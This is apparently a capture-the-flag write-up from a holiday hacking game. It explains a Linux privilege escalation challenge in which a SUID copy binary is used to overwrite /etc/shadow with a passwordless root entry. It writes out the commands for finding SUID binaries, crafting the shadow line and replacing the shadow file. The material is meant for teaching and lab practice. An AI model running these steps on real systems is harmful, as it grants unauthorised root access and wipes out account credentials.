Skip to content

Linux PrivEsc⚓︎

Direct link: Objective URL



Rosemold is in Ostrich Saloon on the Island of Misfit Toys. Give her a hand with escalation for a tip about hidden islands.

Rose Mold

What am I doing in this saloon? The better question is: what planet are you from?
Yes, I’m a troll from the Planet Frost. I decided to stay on Earth after Holiday Hack 2021 and live among the elves because I made such dear friends here.


Linux Privilege Escalation Techniques

There's various ways to escalate privileges on a Linux system.

Linux Command Injection

Use the privileged binary to overwriting a file to escalate privileges could be a solution, but there's an easier method if you pass it a crafty argument..


Upon obtaining console access to the terminal, we started exploring interesting files on filesystem

find / -perm -u+s 2>/dev/null

And we found binary /usr/bin/simplecopy . This binary can copy any file from the system even with root permission. So the plan was to take over root permissions.

Next we checked directory /etc/shadow for its structure. Create simple sh2 file with root account without password.

echo -e "root::19634:0:99999:7:::" > sh2

Next using simplecopy binary we modified /etc/shadow file and from now "su" did not require any password so we could freely use root account

 simplecopy sh2 /etc/shadow


Terminal output




Rose Mold

Yup, I knew you knew. You just have that vibe.